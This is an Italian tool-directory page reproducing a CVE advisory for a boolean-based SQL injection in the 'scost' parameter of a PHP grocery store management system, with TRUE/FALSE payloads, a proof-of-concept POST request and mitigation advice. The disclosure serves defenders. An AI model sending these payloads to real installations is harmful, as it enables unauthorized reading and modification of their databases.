Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-37149 — CVE-2026-37149 - Vulnerabilità di SQL Injection nel parametro scost di search_products.php in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0. | Kitploit
Strumenti/GitHubGitHub/pateldhyeyit/cve-2026-37149
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e FormazioneSicurezza dei Database
GitHubpateldhyeyit/cve-2026-37149

CVE-2026-37149

CVE-2026-37149 - Vulnerabilità di SQL Injection nel parametro scost di search_products.php in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0.

Vedi Repository
222 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-37149 SQL Injection in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0

Panoramica

ID CVE: CVE-2026-37149 Tipo di vulnerabilità: SQL Injection (CWE-89) Gravità: Alta Scopritore: Dhyey Patel

Descrizione

GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 contiene una vulnerabilità di SQL Injection nel parametro "scost" di "/grocery/search_products.php".

L'applicazione non convalida correttamente l'input fornito dall'utente prima di incorporarlo nelle query SQL. Un attaccante può iniettare espressioni SQL appositamente formulate tramite il parametro vulnerabile e manipolare le query del database di backend.

Lo sfruttamento riuscito può consentire l'accesso non autorizzato a informazioni sensibili del database e l'esecuzione di istruzioni SQL arbitrarie.

Prodotto interessato

Prodotto: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN

Versione: v1.0

Repository del fornitore:

https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-

Componente interessato

  • "/grocery/search_products.php"
  • Parametro POST: "scost"

Tipo di attacco Remoto

Informazioni sul fornitore Progetto open-source mantenuto dal proprietario del repository: https://github.com/anirudhkannanvp

Dettagli tecnici

La vulnerabilità è stata confermata utilizzando tecniche di SQL Injection basate su Boolean.

Payload condizione TRUE

-1 OR 321=6 AND 000483=000483 --

Payload condizione FALSE

-1 OR 320=6 AND 000483=000483 --

Le risposte dell'applicazione differivano in base al fatto che la condizione iniettata fosse valutata TRUE o FALSE, confermando la SQL Injection.

Ulteriori test hanno confermato la corretta esecuzione di funzioni SQL tra cui:

SELECT database()

Il nome del database restituito era:

grocery

Ciò dimostra che è possibile eseguire query SQL arbitrarie tramite il parametro vulnerabile.

Prova di concetto

Richiesta

POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded

scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products

Risultato

La risposta cambia in base alla condizione booleana iniettata, confermando la SQL Injection nel parametro "scost".

Impatto

Gli impatti potenziali includono:

  • Enumerazione del database
  • Divulgazione di informazioni sensibili
  • Bypass dell'autenticazione
  • Estrazione di dati
  • Modifica dei record del database

Mitigazione

Gli sviluppatori dovrebbero:

  1. Utilizzare prepared statement.
  2. Utilizzare query SQL parametrizzate.
  3. Validare i parametri di input numerici.
  4. Implementare la validazione dell'input lato server.
  5. Evitare la concatenazione diretta di input controllati dall'utente nelle istruzioni SQL.

Riferimenti OWASP SQL Injection https://owasp.org/www-community/attacks/SQL_Injection

Programma CVE di MITRE https://www.cve.org

Crediti Scoperto e segnalato da: Dhyey Patel

Scarica lo strumento